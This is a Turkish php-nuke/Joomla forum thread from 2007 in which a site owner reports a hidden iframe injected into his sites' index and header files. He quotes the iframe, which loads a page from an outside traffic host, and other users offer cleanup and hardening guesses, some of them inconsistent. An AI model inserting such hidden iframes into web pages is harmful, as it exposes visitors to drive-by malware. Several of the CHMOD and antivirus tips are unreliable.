Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 125
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4701 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(7911 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3295 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(9645 okuma, 10 yanıt)
 Nuke Sentinel..
(4337 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(4871 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3417 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(9979 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9208 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5138 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(40680 okuma, 45 yanıt)
 Bu bir saldırmı..
(8094 okuma, 7 yanıt)
 siteme virüs girmis..
(8201 okuma, 6 yanıt)
 Sitedekileri atmak..
(5146 okuma, 2 yanıt)
 Kötü botları engellemek...
(11069 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7110 okuma, 5 yanıt)
 index atılamayan site yap..
(6991 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5263 okuma, 2 yanıt)
 js trojandownloader.agent..
(5695 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7419 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(4904 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(5882 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(13742 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(26348 okuma, 25 yanıt)
 hacklendim mi?..
(5953 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(75839 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4407 okuma, 1 yanıt)
 Site neden Google i banla..
(4147 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6173 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7219 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7253 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(9730 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(6973 okuma, 5 yanıt)
 forum için kod yazma yasa..
(4877 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4662 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5215 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4724 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3435 okuma, 0 yanıt)
 Protector' deki Host İs..
(3447 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7497 okuma, 7 yanıt)
 index dosyasının chmod k..
(4028 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3600 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(7796 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4450 okuma, 1 yanıt)
 Nuke Güvenlik..
(158237 okuma, 257 yanıt)
 bütün index lere iframe e..
(18540 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5662 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(24070 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(18795 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3747 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - php genel açık
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


php genel açık

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
BoDY_GuaRD
Mesaj: 50+
Mesaj: 50+





Kayıt: Nov 03, 2004
Mesajlar: 53
Konum: Kasyeri

MesajTarih: 2007-05-29, 16:28:46    Mesaj konusu: php genel açık Alıntıyla Cevap Gönder

merhaba.

reseller hesabım var. 8 tane site var içerisinde.

1 tanesi php-nuke gerisi joomla

bugün sitemin dosyalarına bir kaç kod atmışlar.
yönlendirme kodları.

nasıl attılar bilmiyorum ama bütün php sitelere atılmış.

www.idealtarimsulama.com
www.dedikodulu.net

biri joomla diğeri php-nuke

atılan kod ise

Kod:
<i f r a m e name='StatPage' src='http://www.555traff.biz/trf/traf.php' width=5 height=5 style='display:none'></i f r a m e>


nasıl düzeltirim, bunu neden yapmışlar amaçları nedir, bir daha olmaması için neler yapabilirim.

bu arada php-nukede yazdıkları yerler index.php ve themes klasöründeki header.html felan
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger MSN Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-05-19, 08:39:12    Mesaj konusu: Forum Arası Reklamlar


Başa dön
Aliosman
Teknik Yönetici
Teknik Yönetici





Kayıt: Jul 20, 2002
Mesajlar: 3836
Konum: Balıkesir

MesajTarih: 2007-05-29, 17:06:17    Mesaj konusu: Alıntıyla Cevap Gönder

Joomla kullanan sitelerin sahiplerini kontrol edin. calender, uuhp gibi güvenliği zayıf componentleri olanlar kaldırsın. Ayrıca kurulum ve sonrası ayarları bitirdilerse 777 olan klasör CHMOD değerlerini 755 seviyesine geri getirsinler. Birşey ekleyecekleri zaman tekrar 777 yapıp kullanabilirler. Sonrasında tekrar tabii 755 seviyesine getirsinler.

php-nuke kullanan sitede resim galerisi yada upload gerektiren bir uygulama varsa kaldırsın.

Kodu ekledikleri yerleri bulup, tek tek silmelisiniz. Kodu ararken veritabanına da bakmayı unutmayın.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
ERSAT
Mesaj: 200+
Mesaj: 200+





Kayıt: Mar 23, 2005
Mesajlar: 249

MesajTarih: 2007-05-29, 17:49:00    Mesaj konusu: Alıntıyla Cevap Gönder

Bu php açığı değil. Kendi PC'nize virüs giriyor ve uzantısı asp, php, html vs. web sayfası dosyalarına bu i f r a m e kodunu atıyor.
Sizde farkında olmadan siteye upload ediyorsunuz.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Sercan
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 07, 2006
Mesajlar: 1719
Konum: İstanbuL //

MesajTarih: 2007-05-29, 18:29:28    Mesaj konusu: Alıntıyla Cevap Gönder

çoğumuzun bilgisayarında nuke arşivleri falan var bu virüs nereden bulaşıyor ?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
sosge
Mesaj: 200+
Mesaj: 200+





Kayıt: Nov 28, 2004
Mesajlar: 240
Konum: belcika

MesajTarih: 2007-05-29, 21:27:26    Mesaj konusu: Alıntıyla Cevap Gönder

Şu anda Senin sitene girdim ve benim pcmede bulasti bulassin 2 dakkalik omru var bende .. herneyse konuya donelim bundan kurtalmanin tek yolu hostcunla konusacaksin 1 hafta onceki yedekleri sitene atmadan once

ftpni kople sileceksin
veri tabanina kadar sonra eski yedekleri atacaksin modules/Forums/admin kalsorunun chmod ayarini 666 yap phpnuke icin işin oldugunda 777 yapar işini gorur tekrar cıkar 666 yaparsin en basit korunma yontemi bu resim galerisi aliosmanin dedigi gibi pcden avatar yukleme resim album modulu vs gibi eklentiler kullaniyorsan onlarin aciklarini kapatmalisin su anda o virus senin hostunda adi index. asp php html htm cgi yani adi index olan her seyde var kaspersky 5.0 yukleyin guncelleyin ve pc nizden silin n restore dosyalariniza bulasiyor ve hic bir virus programi tanımıyor kspersky haric..



insallah aciklayici bir cevap vermisismdir gecen hafta benim basima geldi cunki ben yasadim ve mümkünse sana zahmet linkleride sil mesajindan cunki bir cok arkadasin pcsinde anti virüs yok


ARKADASLAR ÜSTTEKİ SİTEYE GİRMEYİN BENDEN SİZE TAVSİYE ..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yahoo Messenger MSN Messenger
BoDY_GuaRD
Mesaj: 50+
Mesaj: 50+





Kayıt: Nov 03, 2004
Mesajlar: 53
Konum: Kasyeri

MesajTarih: 2007-05-29, 22:36:49    Mesaj konusu: Alıntıyla Cevap Gönder

sosge :
Şu anda Senin sitene girdim ve benim pcmede bulasti bulassin 2 dakkalik omru var bende .. herneyse konuya donelim bundan kurtalmanin tek yolu hostcunla konusacaksin 1 hafta onceki yedekleri sitene atmadan once

ftpni kople sileceksin
veri tabanina kadar sonra eski yedekleri atacaksin modules/Forums/admin kalsorunun chmod ayarini 666 yap phpnuke icin işin oldugunda 777 yapar işini gorur tekrar cıkar 666 yaparsin en basit korunma yontemi bu resim galerisi aliosmanin dedigi gibi pcden avatar yukleme resim album modulu vs gibi eklentiler kullaniyorsan onlarin aciklarini kapatmalisin su anda o virus senin hostunda adi index. asp php html htm cgi yani adi index olan her seyde var kaspersky 5.0 yukleyin guncelleyin ve pc nizden silin n restore dosyalariniza bulasiyor ve hic bir virus programi tanımıyor kspersky haric..



insallah aciklayici bir cevap vermisismdir gecen hafta benim basima geldi cunki ben yasadim ve mümkünse sana zahmet linkleride sil mesajindan cunki bir cok arkadasin pcsinde anti virüs yok


ARKADASLAR ÜSTTEKİ SİTEYE GİRMEYİN BENDEN SİZE TAVSİYE ..



yorumun için teşekkür ederimde. bu virüs dediğin gibi bir bilgisayara bulaşmış, ondan sonra benim gezdiğim sitelere upload eden bir sistem değil.

bu virüs host makinasındaki bir siteye bir şekilde bulaşmış, ancak nasıl bir yazılımı varsa, makinadaki bütün sitelere kendini eklemiş.
hemde eklenme dosyalarına baksanız, ftp şifresini bilen adam bile zor ekler.

yani dediğin gibi benim bilgisayarıma bulaşıpda siteye bilmeden eklenecek vs.. tarzda bişi değil ki ben 2 haftadır ftp vs.. girmiyorum

+ öyle bişi olsa bile host makinasındaki bütün siteleri ziyaret edip hepsine ben bulaştıramam..

nasıl yayılıyor bende bilmiyorum ama www.dedikodulu.net bunun bütün dosyalarını temizledim. dediğin gibi bulaşacak birşey yok.

www.idealtarimsulama.com ise bunu temizlemedim. bu site üzerinden nasıl birşey olduğunu millet görsün tesbit edelim diye.

Aliosman bey ;

sitemde belirtiğiniz gibi bir açık yok. dosya modu , resim galeri yüklenmesi vs..

yukardada belirtiğim gibi açıkla alakalı değil. bir şekilde bu makinadaki bütün sitelere bulaşmış.

bu son günde moda bir olay bir kaç host makinasına daha olmuş.

zannedersem yakında çoğumuzun başına gelecek.

çünki v bullettin, joomla vs.. farketmiyo.

yeterki php olsun kendini ekliyor
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger MSN Messenger
24872
Mesaj: 50+
Mesaj: 50+





Kayıt: Aug 07, 2006
Mesajlar: 93

MesajTarih: 2007-05-29, 23:10:02    Mesaj konusu: Re: php genel açık Alıntıyla Cevap Gönder

gözlemlediğim kadar bunun açıkla falan ilgisi yok. biri bilerek bir siteye yerleştirmiş . o siteye girildiği zaman virus senin bilgisayara iniyor ki genelde masaüstüne bir exe dosyası atıyor. sonra bu exe senin bilgisayrdaki ftp accountlarıyla senin sitelerine de ekliyor.

sadece php değil. html dosyalarına da ekleniyor.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2007-05-30, 01:34:46    Mesaj konusu: Alıntıyla Cevap Gönder

kendi bilgisayarınızla alakalı. eğer hostunuzda herhangi bir antivirüs yoksa hosta da bulaştırmış olabilirsiniz. kaspersky 6.1 + full update ile bu virüs engelleniyor, nod32 bulmuyor
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-05-19, 08:39:12    Mesaj konusu: Forum Arası Reklamlar


Başa dön
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Tema Seçimini Misafirlere De Açık Tutmak cyprus_tde Php Nuke Sorunlarınız 7 2010-03-14, 16:32:49 Son Mesajı Görüntüle
Yeni mesaj yok Forum Yönetiminde İzinlerde Genel Hat... sofualanli Php Nuke Sorunlarınız 0 2010-01-05, 23:17:15 Son Mesajı Görüntüle
Yeni mesaj yok Windows güncelleştirmeleriniz açık mı... Sergen İnternet Üzerine 16 2009-11-08, 11:50:32 Son Mesajı Görüntüle
Yeni mesaj yok acık artırma modulu varmı? postakusu Php Nuke Modülleri 0 2009-10-02, 22:17:45 Son Mesajı Görüntüle
Yeni mesaj yok İnternette tk alan adı için açık artt... hamzot Domain Pazarı 0 2009-09-04, 10:11:37 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright